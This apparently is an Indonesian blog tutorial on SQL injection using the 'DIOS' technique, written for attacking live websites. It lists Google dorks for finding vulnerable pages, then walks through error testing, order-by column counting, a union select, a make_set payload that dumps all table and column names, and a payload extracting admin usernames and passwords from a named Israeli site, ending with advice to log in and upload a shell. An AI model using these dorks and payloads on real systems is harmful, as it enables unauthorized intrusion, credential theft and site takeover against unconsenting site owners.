Cara Sql With Dios

Assalamualaikum Wr.Wb
Kali Nih Gua Akan Ngasi Tutor Tentang SQL With Dios Banyak Teman dan Orang Lain Ingin Belajar SQL with Dios Biar Bisa Live Target Oke Langsung Saja
Dork : inurl:category.php?id=
inurl:shop.php?id=
inurl:product?id=
(Kembangin Gan Pake Otak Wibu Kalian)

Cara Melihat Vuln Ny gimana Bang? Oke Sekarang Kasih Tanda      '     di belakang URL Bila Blank atau Juga Bisa Berubah Tampilan Nya Atau Eror MYSQL Syntac itu Berarti Vuln

Oke Sekarang OBJ nya
contoh https://target.com?id=5%27
menjadi -> https://target.com?id=5order+by+1--+-
order+by+2--+-
order+by+3--+-
order+by+4--+-
order+by+5--+-
order+by+6--+-
order+by+7--+-no
order+by+8--+-no
order+by+9--+-no
order+by+10--+-no
order+by+11--+-no
order+by+12--+-eror
Dan Oke Gua Udh coba Semua Ny Ternyata Yang Eror order+by+12--+-eror

Oke lanjut ketutorial berikutnya, masukan union select.
Selengkapnya seperti ini,
www.situs.co.il/advertiser_view.php?id=-77+union+select+1,2,3,4,5,6,7,8,9--


Dan mari kita lihat(gambar di atas), dibagian bawah about keluar angka magicknya atau biasa menyebutnya dengan angka ajaib
Kalo ditutorial kemarin kita harus memasukan group_concat dll kali ini enggak, tinggal kita masukan code DIOS nya saja.
Disini w milih angka 9 aja dan berikut ini codeDIOS nya,

make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)

Untuk perintah lengkapnya kek gini
www.situs.co.il/advertiser_view.php?id=-77+union+select+1,2,3,4,5,6,7,8,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)--

Nah lihat itu(gambar diatas), semua column dan beserta table sudah muncul.
Yang kiri itu column kalo yang kanan itu tablenya. Tinggal kita dump deh gaes hehe.

Lanjut ke tutorial ngedumpnya ,cari nama admin atau apa yang sekiranya berbau admin.
Disini target gw nama column admin nya adalah admin dan untuk nama tablenya adalah USER_NAME dan PASSWORD bisa lihat digambar bawah ini,

www.situs.co.il/advertiser_view.php?id=-77+union+select+1,2,3,4,5,6,7,8,make_set(6,@:=0x0a,(select(1)from(admin)where@:=make_set(511,@,0x3c6c693e,USER_NAME,PASSWORD)),@)--

Ternyata kita berhasil ngedump username dan passwordnya.

Setelah itu tinggal cari tempat admin loginya, tapi disini gw udah tau tempat admin loginya jadi tinggal login.

Sekarang cari tempat buat upload shell
Sekian Saja
Assalamualaikum Wr.Wb

Komentar

Posting Komentar

Postingan Populer